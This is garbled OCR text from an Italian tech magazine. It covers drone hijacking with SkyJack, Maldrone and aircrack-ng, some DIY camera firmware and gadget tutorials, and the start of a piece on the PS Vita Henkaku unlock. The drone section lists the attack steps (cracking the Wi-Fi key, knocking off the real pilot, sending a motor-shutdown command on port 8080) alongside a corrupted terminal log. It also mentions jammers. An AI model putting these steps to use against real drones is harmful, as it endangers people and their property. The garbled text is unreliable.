brute force per la decodifica delle chiavi WPA. 


PARROT AR.DRONE 2.0 
Quadricottero comandabile mediante smart¬ 
phone o tablet. Sufficientemente potente per 
trasportare il Raspberry, viene utilizzato dai 
malintenzionati per intercettare e dirottare 
altri droni in volo. 





magini e i video catturati durante il 
volo. Anche in questo caso, un ma¬ 
lintenzionato potrebbe accede¬ 
re da remoto per cancellare 
o sostituire le immagini. 
A quanto pare, poi, le 
vulnerabilità sono 
note già da tempo 
agli addetti ai lavori 


Ben presto potremo imbatterci nei "cacciatori di 
droni" armati del loro potente fucile ad onde radio 
capace di abbattere le macchine volanti. 


e in molti si chiedono come mai non siano state 
ancora risolte mediante un aggiornamento fir¬ 
mware del drone. In compenso, i dettagli degli 
attacchi pubblicati su Internet (il sito di rife¬ 
rimento è www.nodecopter.com/hack) 
hanno consentito ai proprietari di 
alcuni modelli avanzati di dro¬ 
ni di approntare le giuste 
contromisure per pro¬ 
teggere i loro dispo¬ 
sitivi e la rete Wi-Fi 
mediante chiavi 
di sicurezza ba¬ 
sate sul protocollo 
WPA2 (lo stesso, per intenderci, 
di quello utilizzato sui router Wi-Fi domestici). 


Disturbi via radio 

Durante le conferenze del DEF CON di Las 
Vegas si è scoperto, poi, che i droni che uti¬ 
lizzano un sistema di controllo via radio sono 
meno vulnerabili agli attacchi rispetto a quelli 
basati su sistemi Wi-Fi. In realtà, utilizzando 
un jammer (cioè un disturbatore di frequenze 


che utilizzano un sistema di telecontrollo Wi-Fi 
simile a quello del Parrot. 


Come avviene l’attacco 


Il principio di funzionamento che sta alla base 
dell’attacco è semplice. In una prima fase il 
pirata di turno disconnette l'applicazione pro¬ 
prietaria che permette di controllare il drone 
dallo smartphone o dal tablet, per poi prenderne 
il controllo utilizzando un'altra applicazione 
installata su un suo dispositivo mobile, facendo 
allontanare l’apparecchio prima che il legittimo 
proprietario riesca a ristabilire il contatto 
Wi-Fi con il drone stesso. Come se non 


bastasse, il professor Robinson ha 
scoperto che alcuni droni Par¬ 
rot hanno anche una porta 
FTP aperta che viene 
utilizzata per tra¬ 
sferire le im¬ 


cellulari GSM, GPS e UMTS) i pirati informatici 
potrebbero interferire con il modulo satellitare 
del drone disattivando di fatto la funzione di 
ritorno automatico al punto di decollo, oppure 
alterare la bussola magnetica installata a bordo 
impedendo al velivolo di decollare o atterrare 
correttamente. 

Perché dirottare un drone? 

Ma quale può essere la motivazione che spinge 
i pirati informatici a prendere il controllo di un 
drone civile (per non parlare di quelli militari)? 
Sicuramente per finalità di terrorismo, oppure 
per commettere un qualche tipo di reato o an¬ 
cora per un mero esercizio stilistico utile solo a 
dimostrare che si può fare, in modo da mettere 
in guardia gli utenti dalle vulnerabilità esistenti 
e dai pericoli cui vanno incontro. Pensiamo, ad 
esempio, ai droni su cui sta lavorando Amazon 
per la consegna rapida dei suoi pacchi: un ma¬ 
lintenzionato potrebbe manipolarli per rubare 
il loro carico e poi servirsene per distribuire e 
consegnare carichi di droga, incoraggiare le 
attività del mercato nero o fare arrivare oggetti 
non autorizzati all'interno di carceri e zone mi¬ 
litari altrimenti inaccessibili. Un altro possibile 
scenario potrebbe essere quello dello spionaggio 
aziendale. Un drone che opera normalmente 
aH’interno di una grande fabbrica con funzioni 
di video sorveglianza, potrebbe essere dirottato 
e manipolato per rubare le immagini della te¬ 
lecamera integrata, permettendo ad un hacker 
di spiare e trafugare informazioni commerciali 
sensibili. Scenari plausibili che già prefigurano 
una "corsa agli armamenti" tra hacker e pro¬ 
fessionisti della sicurezza in una vera e propria 
guerra cybernetica che coinvolgerà sia il mondo 
militare sia quello civile. Perché bisogna sempre 
tener conto che un drone altro non è se non un 
computer in miniatura involo sulle nostre teste. 

E i computer, si sa, possono essere manipolati 
a proprio piacimento! ► 


il 
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ANCHE I DRONI HANNO IL LORO MALWARE 


Viviamo in un'epoca interconnessa in cui tutti 
i dispositivi digitali sono potenziali bersagli da 
parte di pirati informatici e malintenzionati. A 
questa "regola" non sfuggono i droni commer¬ 
ciali, ormai diffusissimi e alla portata di chiunque. 
Per questo motivo, i pirati stessi hanno iniziato a 
sviluppare malware capaci di infiltrarsi e bypas- 
sare i controlli di quasi tutti i più diffusi modelli 
di droni. Maldrone, ad esempio, è una backdoor 
studiata per installarsi sul sistema operativo 
dei droni Parrot chiamato .elf (che è un piccolo 
software che controlla l'intero drone usando i 
dati di navigazione di bordo. Questo piccolo 
programma è abbastanza intelligente per ese¬ 
guire l'atterraggio automatico, gestire la stabilità 
di volo e vari altri funzionalità del velivolo) che 
permette al pirata che si trova nelle vicinanze 
del velivolo di "intercettarlo" per prenderne il 
completo controllo. 



Anche un drone militare da milioni di euro come l'RQ-170 Stealth Sentinel della US Air Force americana 
è a rischio attacco. Il suo punto debole è il sistema di posizionamento globale (GPS) che può essere 
manomesso mediante un jammer capace di disturbarne le frequenze di funzionamento. 


IL CACCIATORE DI DRONI 


Samy Kamkar, invece, l'hacker dietro al worm che 
paralizzò MySpace nel 2005, ha pubblicamente 
rilasciato le specifiche per assemblare il drone 
SkyJack, un AR Drone 2.0 della Parrot sulla quale è 
installato un Raspberry Pi e aircrack-ng, una utility 
Wi-Fi che consente il cracking di password WEP 
e WPA. Il dispositivo così allestito è in grado di 
bucare la rete locale creata tra il drone e il dispo¬ 
sitivo di controllo permettendo di intercettare 
in volo qualsiasi drone dotato di connettività 


Wi-Fi e dirottarlo dovunque (leggi il box in bas¬ 
so Cronistoria di un dirottamnto). In pratica, 
l'hacker è riuscito a riprodurre in piccolo quello 
che l'esercito iraniano sarebbe riuscito a fare nel 
2011 dirottando un drone militare RQ-170 Stealth 
Sentinel della US Air Force americana in volo 
lungo il confine del paese con l'Afghanistan. In 
quel caso, mediante un attacco di tipo spoofing, 
i militari iraniani sarebbero riusciti a manipolare 
il sistema di posizionamento globale (GPS) del 


drone da milioni di euro inviandogli coordinate 
sbagliate e costringendolo ad atterrare in Iran. 
Gli Stati Uniti hanno ovviamente smentito que¬ 
sta operazione di hackeraggio, giustificando 
l'accaduto con un semplice malfunzionamento 
del velivolo: sta di fatto che l'esercito americano 
è attualmente al lavoro con la Boeing per svilup¬ 
pare un drone "a prova di hacker" dotato di un 
sistema di comunicazione di bordo protetto da 
eventuali attacchi informatici. 


CRONISTORIA DI UN DIROTTAMENTO 



pi*r 

espórr rypi 

i ./dron«_st 

peri 

marnine : 

Settlng locale 

peri 

uarnin|; 

Pleisc check t 


sr* 

supported and mstalled 

peri: Marnine: Falline Pack to 

Running : 

ifconfig ulani dovn 

pi <3 3869 


Running 

kilt 3686 

Runm ri* 

kilt HUP 3888 

Runmng 

klll •9 3880 

Running: 

killall -9 aireplay-n* 


2 A questo punto, il pirata installa 
su Skyjack il tool di rete aircrack- 
ng che consente di scannerizzare le 
reti Wi-Fi in prossimità del Raspber¬ 
ry Pi. Per intercettare i droni Parrot, 
il pirata provvede quindi a scaricare 
da Internet i seriali dei MAC Address 
dei velivoli. 


I li pirata deve innanzitutto do¬ 
tarsi di un Raspberry Pi con si¬ 
stema Unix/Linux installato. Succes¬ 
sivamente provvede ad installare 
Skyjack sulla memoria del mini PC 
(disponibile su GitHub): si tratta di 
un programma Perl che gira su una 
macchina Linux. 
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4 11 pirata si dota ora di una sche¬ 
da di rete Wi-Fi configurabile in 
monitor mode (la modalità che per¬ 
mette di sniffare le reti Wi-Fi) come 
la Alfa AWUS036H o la Edimax EW- 
7811 Un. Quindi scarica il malware 
Maldrone (disponibile su GitFlub) e 
lo installa sul Raspberry Pi. 


Pro***» ft Vt Kfr o PanOPd 4 w*er*al 

Panano Sccnonauk» 


3 11 pirata è pronto per avviare 
aircrack-ng. Inserisce nella 
memoria del programma l'elenco 
dei MAC Address appena scaricato. 
Installa quindi anche un desktop 
remoto comeTeamviewer in modo 
da riuscire a controllare a distanza 
il Raspberry Pi. 
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III 


NEANCHE I DRONI A CONTROLLO RADIO 
DIGITALE SONO AL SICURO 


Grazie ad un radio scanner di libera vendita 
è facilissimo intercettare le frequenze su cui 
vengono trasmessi i pacchetti dati inviati per 
il pilotaggio di drone a comando radio con 
frequenze di 2,4 GHz. Addirittura è possibile 
costruire in casa uno scanner radio partendo 
semplicemente da una chiavetta DVB-T, ov¬ 
vero quei dispositivi USB che permettono di 
guardare i canali televisivi del digitale terrestre 
sul computer. Installando un software come 
ZADIG si riesce ad interfacciare il proprio si¬ 


secondo una crittografia estremamente evo¬ 
luta. Di conseguenza la Rx (ricevente) accetta 
solo ed esclusivamente le stringhe (codificate) 
emesse dal proprio Tx (trasmittente). Anche 
ad aver sniffato la frequenza, andremmo a 
bombardare la ricevente del sistema aero¬ 
mobile di pacchetti dati per ottenerne il co¬ 
mando, ma questi stessi pacchetti verrebbero 
puntualmente scartati perché non codificati 
rispetto alla crittografia prevista. Ora, poiché 
le combinazioni di codifica sono milioni, an- 


potente disturbatore 
di frequenze tascabile. 
Grazie alle sue 8 bande 
e agli 8W di potenza 
generata, permette di 
inibire il funzionamento 
di ogni sistema di 
localizzazione, anche 
di ultima generazione, 
4G LTE e LoJack. È 
acquistabile on-line a 
circa 450 euro. 



sterna operativo con il chipset della chiavetta 
USB DVB-T. Successivamente, mediante un 
emulatore di "ascolto"delle radiofrequenze è 
possibile visualizzare i valori delle frequenze 
sniffate dal radio scanner.Teoricamente, quindi, 
basterebbe riprogrammare un radiocomando 
con la frequenza che interessa e cercare di 
ottenere il controllo del velivolo preso di mira. 
Ovviamente le cose non sono così semplici. I 
dati trasmessi dai radiocomandi di ultima 
generazione sono in forma digitale e 
ogni radiocomando trasmittente è 
"bindato"con la propria ricevente 





( 





che gli apparati radiocomando/ricevente più 
economici risultano comunque decisamente 
inattaccabili mediante una semplice strumen¬ 
tazione fai-da-te. Quello che un malintenziona¬ 
to potrebbe fare, anche se le leggi europee ne 
vietano assolutamente la fattibilità, è jammare 
un drone disturbando le frequenze fino alla 
totale perdita di controllo del velivolo. Con un 
jammer (acquistabile anche a poche centinaia 
di euro) è possibile disturbare la frequenza dei 
moduli GPS, oppure il radiocontrollo a 2,4 
GHz oppure ancora soltanto le frequenze di 
trasmissione video per"accecare"il drone. 



5 Per rendere il dispositivo utiliz¬ 
zabile in mobilità, il pirata col¬ 
lega al sistema una batteria USB, 
possibilmente del peso inferiore 
a 100 grammi, che possa produrre 
una potenza prossima a 1000 mAh. 
Quindi monta il Raspberry Pi sul 
proprio drone e si alza in volo. 


6 Effettuato il decollo del drone, 
il pirata avvia aircrack-ng ed 
effettua una scansione dei segnali 
Wi-Fi presenti nel raggio di circa 300 
metri. Nel momento in cui intercetta 
il MAC di un AR.Drone, aircrack-ng 
sarà in grado di intercettarne la tra¬ 
smissione e decriptare la password 
Wi-Fi. 



Latnch 



7 11 malintenzionato inserisce ora 
i dati all'interno di SkyJack: l'ap¬ 
plicazione stabilirà in automatico 
una connessione col drone bersa¬ 
glio, disconnetterà il pilota "reale" e 
si autenticherà come falso control¬ 
lore ricevendo via DHCP un indirizzo 
IP appartenente alla stessa rete del 
drone bersaglio. 


8 Entra in gioco Maldrone. L'ha- 
cker può provocare il mal fun¬ 
zionamento dell'UAV, decretandone 
lo schianto, o connettersi in HTTP 
sulla porta 8080 dell'OS del drone, 
per impartire comandi in grado 
di dirottare il volo: shutting fblar- 
drone master controlls in 3 seconds, 
ad esempio, spegnerà i motori del 
drone entro 3 secondi. 
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SOFTWARE COMPLETO 


SOFTWARE COMPLETO 


;ker della 
tocamera 

I firmware, i gadget e gli accessori 
fai da te per sfruttare al massimo 
il nostro “occhio digitale” 


Cosa ci O 
occorre facile 


I tempi della pellicola, dei rullini da 
sviluppare e delle costosissime stam¬ 
pe fotografiche sono fortunatamente 
ben lontani dai giorni nostri. Oggi, infatti, 
è possibile con appena poche centinaia 
di euro accaparrarsi fotocamere digitali 
aH'ultimo grido dotate di ogni meraviglia 
tecnologica che ci permettono di ottenere 
risultati da capogiro, degne dei grandi fo¬ 
tografi professionisti. Per non parlare poi 
degli smartphone più evoluti che integrano 
sensori capaci di sfornare immagini che of¬ 
frono un dettaglio e una qualità addirittura 
superiore a quella di una comune digicam. 
Già di default, dunque, i mezzi fotografici a 
nostra disposizione sembrano essere suf¬ 
ficienti per realizzare scatti degni di nota. 
Ma possiamo ottenere di più! 


Funzioni nascoste 

Non tutti sanno, infatti, che esistono dei 
firmware modificati che estendono le fun¬ 
zionalità della nostra fotocamera reflex o 
applicazioni per Android e iOS che spremono 
al massimo la fotocamera integrata dello 
smartphone. Inoltre, grazie ad alcuni gad¬ 
get (acquistabili sul Web a poche decine di 
euro) possiamo abbattere ogni limite fisico 
della fotocamera del telefonino: ad esempio, 
possiamo aggiungere un vero e proprio zoom 
ottico (senza dunque far uso di quello digi¬ 
tale che, il più delle volte, tende a sgranare le 
nostre foto) allo smartphone o trasformarlo 
in un microscopio o un endoscopio. Il tutto, 
senza correre il rischio di fare danni o senza 
invalidare la garanzia che copre la nostra 
fotocamera reflex o compatta. In definitiva, 
non abbiamo nulla da perdere ma tanto da 
guadagnare. Cos’altro aspettiamo? Rim¬ 
bocchiamoci subito le maniche ed iniziamo 
questa nuova e divertente avventura. 


APP ANDROID PER 
EDITING DI FOTO 

INSTABEAUTY 


Quanto costa: Gratuita 
Sito Internet: 

https://play.google.com 


FIRMWARE CUSTOM 
PER REFLEX 

MAGIC LANTERN 


Lo trovi su: ‘•'DVD 

Sito Internet: 

www.magiclantern.fm 


ENDOSCOPIO 
PER SMARTPHONE 

3.5M 7MM USB 
6LED ANDROID 
ENDOSCOPE 

Quanto costa: € 21,99 
Sito Internet: 

www.amazon.it 
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Trucca la tua reflex digitale! 

Grazie al firmware non ufficiale Magic Lantern, possiamo aggiungere nuove funzionalità alla nostra Canon: 
ecco come installarlo, configurarlo e utilizzarlo senza compromettere la funzionalità della preziosa fotocamera. 



^ La giusta meta 

Dal PC avviamo il browser che preferiamo (ad esempio 
Google Chrome) e raggiungiamo il sito Web www.magi- 
clantern.fm. Da qui, spostiamoci nel menu Download e clicchia- 
mo sul pulsante Download Nightly Builds per scaricare l'ultima 
release disponibile del firmware customizzato. 




Maqk Ijrrtw 


^ Ad ogni camera il suo firmware 

2 Nella nuova pagina che appare, selezioniamo dal menu 
a tendina Selectyout Camera il modello di fotocame¬ 
ra Canon reflex in nostro possesso (per il nostro test ci siamo 
affidati ad una Canon EOS 7D). Clicchiamo quindi sul pulsante 
Download per scaricare il firmware Magic Lantern. 


Aggiornamento firmware 

Versione corrente 2.0.3. 
Aggiornare. 


Annulla 


OK 



TUTTA UNA 
NUOVA REFLEX! 

Quali funzionalità 
aggiunge il firmware 
Magic Lantern alla 
nostra reflex Canon? 
Anzitutto, migliora (e 
non di poco) la realiz¬ 
zazione di filmati. In 
modalità live-view, 
infatti, potremo vedere 
l'istogramma dell'in¬ 
quadratura, la distanza 
di messa a fuoco o 
applicare già in fase di 
recording effetti come 
l'HDRo filtri avanzati. 

In modalità foto, poi, 
ci sarà consentito di in¬ 
nalzare i tempi di scat¬ 
to fino a 8 ore. Se vo¬ 
gliamo conoscere tutte 
le potenzialità di Magic 
Lantern, facciamo un 
salto sulla pagina Web 
www.magiclantern. 
fm/features.html. 


x Sulla compact flash 

Al termine, scompattiamo l'archivio .zip appena scarica¬ 
to e selezioniamo tutti i file e le directory presenti al suo 
interno. Colleghiamo la memoria SD (o la compact flash) al PC 
e, dopo averla formattata, incolliamo al suo interno tutti i file che 
abbiamo copiato in precedenza. 


Magic Lantern instali jjrrr;: 

Backing up POMO... SS;"' 

Backing up ROM1... 

Setting boot flag... 

Making card bootable... 

Done! 

Please restart your camera. 

Aitar restart, etani se copy Ml/L OC.S/ ROM* 8*4 to PC in a vafe pince 
We mey nord thew f»tas «n cose of emergency 


To unlnttal Mogtc Lantern, pirata watt for 47 seconda 


x Aggiorniamo il software! 

4 Scolleghiamo la memoria dal PC e inseriamola nello slot 
della fotocamera. Spostiamoci nel menu di Aggiorna¬ 
mento firmware (varia in base alla fotocamera in proprio pos¬ 
sesso) e premiamo OK per procedere all'aggiornamento del sof¬ 
tware di base della nostra reflex Canon. 


Aggiornamento firmware 

Versione corrente 2.0.3-ml-Nightly.2 
Aggiornare. 


Annulla OK 


SBARAZZIAMOCI 
DI MAGIC 
LANTERN 


Se vogliamo ritornare 
al firmware originale 
della fotocamera, ci 
basta formattare la 
scheda di memoria 
direttamente dalla 
fotocamera. Una volta 
raggiunto il menu di 
formattazione della 
card, apparirà la nuova 
voc e Remove Magic 
Lantern. Selezionia¬ 
mola e, al successivo 
riavvio, sulla nostra re¬ 
flex ritornerà ad essere 
in funzione il firmware 
originale Canon. 


^ Riavvio necessario 

Sul display della fotocamera appariranno una serie di task 
che verranno eseguiti automaticamente. Al termine, un mes¬ 
saggio informativo (Please restart your camera) ci inviterà a proce¬ 
dere al riavvio della fotocamera: ciò serve a rendere operativo il nuo¬ 
vo firmware modificato. 


^ Apprezziamo ie nuove features! 

Se tutto è andato per il verso giusto, spostandoci nuova¬ 
mente nel menu di aggiornamento del firmware (Passo4) 
vedremo che la versione corrente del software di sistema è stata 
cambiata (nel caso in figura, 2.0.3-ml-Nightly.2). Scopri alcune 
delle nuove funzionalità leggendo il box laterale. 


► 
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LA COMPATTA CHE SI CREDE UNA REFLEX 


Chi l'ha detto che una fotocamera compatta 
non può scattare nel formato professionale 
RAW o realizzare filmati di tutto rispetto? 
Utilizzando dei firmware modificati, infatti, 
possiamo farlo, a patto di possedere una ca¬ 
mera compatta Canon compatibile. Tutto 
quello che ci serve è il software CardTricks 
(scaricabile gratuitamente da www.winma- 
gazine.it/link/3388) e il firmware modificato 
per la fotocamera compatta Canon in no¬ 
stro possesso. Per verificare se quest'ulti- 
ma è compatibile, raggiungiamo la pagina 
http://mighty-hoernsche.de e verifichiamo 
se il nostro modello è presente nella lista. 
In caso positivo, scarichiamo l'archivio .zip 


relativo alla fotocamera compatta da custo- 
mizzare. A questo punto, possiamo avviare 
CardTricks e clicchiamo sul pulsante Auto. 
Inseriamo la scheda di memoria nel lettore 
del PC, selezioniamola dall'elenco che appare 
e confermiamo con Off. Formattiamo la card 
con Format as FAT, confermiamo con O/C, e 
clicchiamo su Make bootable. Premiamo 
CHDK/carde selezioniamo l'archivio .zip scari¬ 
cato in precedenza (il firmware modificato per 
la nostra fotocamera compatta). Al termine 
del caricamento dei file sulla card, possiamo 
inserire la scheda di memoria nel lettore della 
fotocamera e accenderla. Attendiamo quindi 
che il software venga installato sulla camera. 



Per foto che vanno a fondo! 


Trasformiamo lo smartphone in un perfetto endoscopio per fotografare particolari altrimenti irraggiungibili. 

Tutto quello che ci occorre è un gadget, come il 6Led Android Endoscope, acquistabile su Amazon. Ecco come fare. 



No USB Web camera found. 
Please confirm connection to USB 
Web camera. 


^ Serve l'app giusta! 

Direttamente dallo smartphone Android colleghiamoci a www.winma- 
gazine.it/link/3389 e procediamo al download del file APK. Al termine 
del download, installiamo l'app tappando sul file appena scaricato e confer¬ 
mando con Installa seguito da Fine. 


^ Colleglliamo l'endoscopio! 

Colleghiamo l'endoscopio all’ingresso microUSB dello smartphone 
(quello che generalmente utilizziamo per caricare il telefonino) e avvia¬ 
mo l'app Endoscope. Dopo una manciata di secondi il nostro nuovo gadget 
verrà rilevato e l'immagine inquadrata apparirà sul display. 




^ Più luce nelle tue foto 

Sul cavo dell’endoscopio è presente una rotella: modificandone la posi¬ 
zione regoliamo l’intensità del LED di illuminazione presente sull’obiet¬ 
tivo del gadget. Così facendo potremo ottenere immagini ottimali anche nelle 
condizioni più impervie (ad esempio all’Interno di tubazioni). 


^ Fotografare particolari irraggiungibili! 

^ Tappando su Settings (prima icona in basso a destra) possiamo rego¬ 
lare i parametri di inquadratura. Se vogliamo scattare una foto, pre¬ 
miamo il pulsante azzurro presente in basso al centro. Per registrare un video, 
invece, tappiamo sull'Icona a forma di videocamera e successivamente il pul¬ 
sante rosso. 
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GLI ACCESSORI CHE RENDONO "SUPER" IL PROPRIO SMARTPHONE 


Un treppiede da smartphone 

Vogliamo realizzare un selfie che sia perfetto? 0 vogliamo scattare una foto uti¬ 
lizzando tempi di esposizione molto lunghi ed immortalare in maniera artistica 
un paesaggio mozzafiato? Quello che ci occorre è un cavalletto 
da smartphone. Il modello che abbiamo deciso di mettere alla 
prova è molto compatto (a tal punto da entrare senza problemi 
nella tasca dei pantaloni) ed è corredato anche di un comodo 
telecomando di scatto a distanza. La compatibilità del 
telecomando è assicurata sia su Android (a partire 
dalla versione 4.2.2) che su iOS (versione 6.0 
superiore). 

■ Quanto costa: € 7,89 ■ Sito Internet: www.canon. it 


0 



Lo zoom ottico per il telefonino 

Lo zoom digitale della fotocamera integrata nel nostro smartphone non ci sod¬ 
disfa? Nessuna paura! Sul Web è possibile acquistare dei zoom ottici a poche 
decine di euro. Il risultato? Davvero sorprendente. Certo, 
non aspettiamoci la qualità di un teleobiettivo da fotoca¬ 
mera reflex, ma si tratta comunque di soluzioni più che 
decenti che ci permettono di raggiungere i soggetti che 
sono troppo distanti da noi. Lo zoom che abbiamo avuto 
modo di testare viene fornito con una cover per il nostro 
smartphone in modo da garantire la perfetta aderenza 
con la fotocamera integrata. 

■ Quanto costa: € 15,99 n Sito Internet: www.amazon.it 



Un microscopio nello smartphone 

Apportando una piccola modifica “hardware”, possiamo trasformare la fotocamera del nostro smartphone 
in un visore digitale utile per scoprire le meraviglie del micro mondo! Ecco come procedere. 



a. Tutto l'occorrente 

Oltre allo smartphone, ci serve anche una piccola lente di ingrandi¬ 
mento da applicare sopra l’obiettivo della fotocamera. A tal scopo, 
possiamo servirci della lente che concentra la luce nelle piccole torce por¬ 
tatili. Smontiamola delicatamente servendoci di un giravite e di una pinzetta. 


^ La [ente di ingrandimento 

Servendoci di una piccola striscia di nastro adesivo fissiamo la len¬ 
te sull'obiettivo della fotocamera, prestando attenzione, ovviamente, 
a non occludere l'obiettivo stesso. In alternativa, possiamo procurarci un 
supporto di vetro o di plexiglass trasparente su cui fissare la piccola lente. 



^ Osserviamo il micro mondo 

Posizioniamo l'oggetto da fotografare su un supporto per evitare scatti 
mossi. Volendo fotografare materiali naturali come le foglie o comun¬ 
que parzialmente trasparenti come un foglio di carta, è utile illuminarli da sot¬ 
to con una torcia: mettiamo in funzione il nostro nuovo microscopio digitale! 


^ Microscopio già pronto all'uso 

^ Scattare una foto con lo smartphone usando un ingrandimento del 
150x? È possibile grazie al progetto Micro Phone Lens 150x: Celi Pilo¬ 
ne Based Microscope. L'idea è venuta al ricercatore Thomas Larson di Seattle, 
che l’ha pubblicata sul sito KickStarter (www.winmagazine.it/link/2839). 


► 
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Fai da te | Hacker della fotocamera 


Per foto che lasciano il segno! 

Installiamo l'app gratuita InstaBeauty e miglioriamo le nostre foto: possiamo agire sui toni della pelle e correggere 
ogni piccola imperfezione. Il risultato finale sarà davvero tutto da vedere e rivedere. 


« InstaBeauty - Selfie 0 
s . Camera 

Fotoable.lnc. 

Q PECI 3 


INSTALLA 


^ La giusta app 

Verifichiamo che il nostro smartphone o tablet Android 
sia connesso a Internet tramite la rete 3G/4G o un 
hotspot Wi-Fi e accediamo al Play Store. Da qui ricerchiamo 
l'app gratuita InstaBeauty. Tappiamo quindi su Installa e suc¬ 
cessivamente su Accetto. 



^ Toni caldi o freddi? 

Subito dopo l'acquisizione della foto ci verrà proposto 
un primo editing di miglioramento. Spostiamo il cursore 
verso Warm o Cool se vogliamo rispettivamente dei toni più 
caldi o più freddi. Selezioniamo anche un livello di Soften per 
ridurre il rumore. 



^ ... e manuale! 

Spostiamoci prima in Skin (per migliorare i toni della pelle), 
poi in Slim Face (per toglierci qualche grammo dal viso) 
e in Nose Lift (per migliorare l'apparenza del naso). Effettuiamo i 
nostri settaggi e salviamo premendo sempre il pulsante presente 
in basso a destra. 



▲ Il primo scatto 

Siamo pronti a realizzare il nostro primo scatto con 
InstaBeauty. Per passare dalla fotocamera frontale a 
quella posteriore, effettuiamo uno slide sullo schermo e per 
scattare utilizziamo il pulsante di scatto presente in basso al 
centro. 



^ Ritocco in automatico... 

4 Tappiamo sul pulsante rosso presente in basso al centro 
e successivamente su Auto Retouch. Verranno proposti 
una serie di filtri di colore che migliorano la nostra immagine. 
Scegliamo quello che preferiamo e confermiamo con il pulsan¬ 
te in basso a destra. 



^ Il risultato finale 

Il nostro scatto di test iniziale non è un granché, 
complici anche delle luci non perfette e la fotocame¬ 
ra frontale che, si sa, offre sempre una risoluzione minore 
rispetto a quella posteriore. Ciononostante, il risultato finale 
è davvero sorprendente. 



UNA COPIA 
DI BACKUP 


Vogliamo tenere una 
copia di backup dei 
nostri scatti originali 
(in modo da compararli 
con il risultato finale 
o per creare nuove 
elaborazioni)? Nessun 
problema. Quello che 
dobbiamo fare è acce¬ 
dere al menu Settings 
di InstaBeauty e da qui 
tappare su Serve origi¬ 
na/in Camera mode. 


EMOTICONS 
E TESTO 

Tappando sul pulsante 
Edit di InstaBeauty (in 
fase di ritocco) abbia¬ 
mo anche la possibilità 
di aggiungere del 
testo o delle emoticons 
alle nostre foto. Nel 
caso in cui volessimo 
aggiungere del testo, ci 
basta tappare su 7exf e 
successivamente su Top 
to input per inserire 
ciò che vogliamo. Pos¬ 
siamo anche scaricare 
gratuitamente dei font 
aggiuntivi o cambiare 
il colore del testo 
inserito. 
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Lo smartphone diventa reflex 

Con l’applicazione Camera FV-5 possiamo trasformare il nostro telefonino in una perfetta fotocamera 
professionale che ci permette di regolare anche tempi di esposizione, sensibilità ISO e bilanciamento del bianco. 



^ Il corretto valore ISO 

Installiamo l'app Camera FV-5 e accediamo 
alle impostazioni. Settiamo VISO che Indica la 
sensibilità del sensore alla luce. Possiamo sceglie¬ 
re di mantenere un valore automatico o sceglierlo 
manualmente secondo le nostre esigenze. 



^ La giusta tonalità 

^ Per rendere naturali i colori delle fotografie, 
dal menu dell’app impostiamo anche il Bilan¬ 
ciamento del bianco. Per ottenere colori e tonalità 
uniformi scegliamo la modalità automatica oppure 
regoliamolo in base alle condizioni ambientali del 
luogo in cui stiamo eseguendo lo scatto. 


^ Il tempo di esposizione... 

... indica per quanto tempo la luce viene fat¬ 
ta entrare fino al sensore. Più è alto questo 
valore (in frazioni di sec) più luce entrerà. Sullo smar¬ 
tphone otterremo un risultato simile, emulato via sof¬ 
tware in quanto i sensori non sono così avanzati. 



^ Quando usare il flash? 

Non dimentichiamo di settare corretta- 
mente la Modalità Flash. In caso di foto 
diurne (o alla luce diretta del sole) è meglio disat¬ 
tivare Il flash. In alternativa inseriamo l’uso auto¬ 
matico o la modalità SL che "riempirà” le zone 
d'eccessiva ombra. 


^ Mettere a fuoco 

Entrando nella Modalità messa a fuoco 
impostiamo quindi le modalità di focus che 
più si adattano alle nostre esigenze. Se dobbiamo 
fotografare un particolare, da vicino, come ad esem¬ 
pio un fiore, servirà impostare su macro. 



^ Selfie perfetti! 

Agendo da Utility per lo scatto possiamo 
impostare la modalità autoscatto impo¬ 
stando i valori di attesa (dai 2 ai 10 secondi). Uti¬ 
le sia negli ormai celeberrimi selfie sia in caso di 
foto di gruppo in cui io smartphone viene lascia¬ 
to sul piedistallo. 


ECCO COME MIGLIORARE I PROPRI SCATTI VIA SOFTWARE 

Vuoi ottenere il massimo dalla fotocamera del tuo smartphone? Ecco le app che non possono mancare sul tuo dispositivo. 


APP 

SISTEMA OPERATIVO 

QUANTOCOSTA 

RETRICA 

Android, iOS 

Gratuita 

LIGHTMETERFREE 

Android 

Gratuita 

PHOTO EDITOR 
COLLAGE MAKER 

Android 

Gratuita 

FOTOMONTAGGI 

DIVERTENTI 

Android 

Gratuita 

HIPSTAMATIC 

iOS 

€2.99 

INSTAGRAM 

Android, iOS 

Gratuita 

PROCAM 3 

iOS 

€4.99 


COSA FA? 


È considerata una delle migliori app di editing fotografico disponibili per Android 
e iOS. Consente di applicare numerosi filtri fotografici ed effetti grafici. 

Vogliamo verificare se le nostre foto hanno la luce ideale? Questa è l'app che fa al caso 

nostro. 

Perfetta per creare dei collage fotografici. Ci permette di scegliere fra decine di layout 

differenti. 

Se vogliamo dare un tocco personale e divertente alle nostre foto, questa è l'app 
giusta: consente di creare dei fotomontaggi perfetti. 

Per i possessori di iPhone è la migliore app di fotografia disponibile. Consente 
di regolare ISO e tempi di esposizione. 

App che non ha bisogno di presentazioni. Consente di applicare centinaia di filtri 
alle nostre foto. 

Trasforma l'iPhone in una perfetta fotocamera consentendo inoltre di salvare 
le immagini anche nel formatoTIFF. 
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Per saperne di più | PS Vita 



Ecco come sbloccare la console 
per installare software scaricati 
dai canali underground del Web 


Cosa ci ^3 
occorre DIFFIC|L 


CONSOLE DI GIOCO 

SONY 

PSVITA 2000 

Quanto costa: € 199,98 

Sito Internet: 

www.gamestop.it 
Note: La console viene 
venduta in abbinamento 
con il gioco Phineas 
& Ferb: Il Giorno del 
Dott. Doofenshmirtz. 


E notizia fresca che anche la PS Vita, 
console portatile di casa Sony, è stata 
"unlockata" (cioè sbloccata) da un 
team di coder chiamato Molecule. L’hack 
di uno dei migliori kernel (sistema ope¬ 
rativo) sviluppati negli ultimi anni ha 
portato un grandissimo fermento nella 
scena underground degli sviluppatori in 
quanto permette di eseguire emulatori di 
retro-console e applicazioni "non firmate”, 
cioè non approvate da Sony e distribuite 
da sviluppatori indipendenti. L’idea del 
team Molecule, infatti, è stata quella di 
sviluppare un haclc che incentivasse non 
la mera pirateria multimediale e digitale, 
ma il progresso e lo sviluppo di una scena, 
quella per PsVita, che sembrava a fine ciclo 
e che ristagnava da tempo immemore. 

Come un iPhone 

È bene iniziare a dire che l’hacksviluppato 
dal Team Molecule, dal nome di Henkaku, 
assomiglia moltissimo ad un Jailbreack 
per iPhone, sia per modalità di esecuzione 
sia per il fatto che è del tutto reversibile, 
ossia che non ha bisogno di interventi 
hardware sulla console (che tra l'altro 
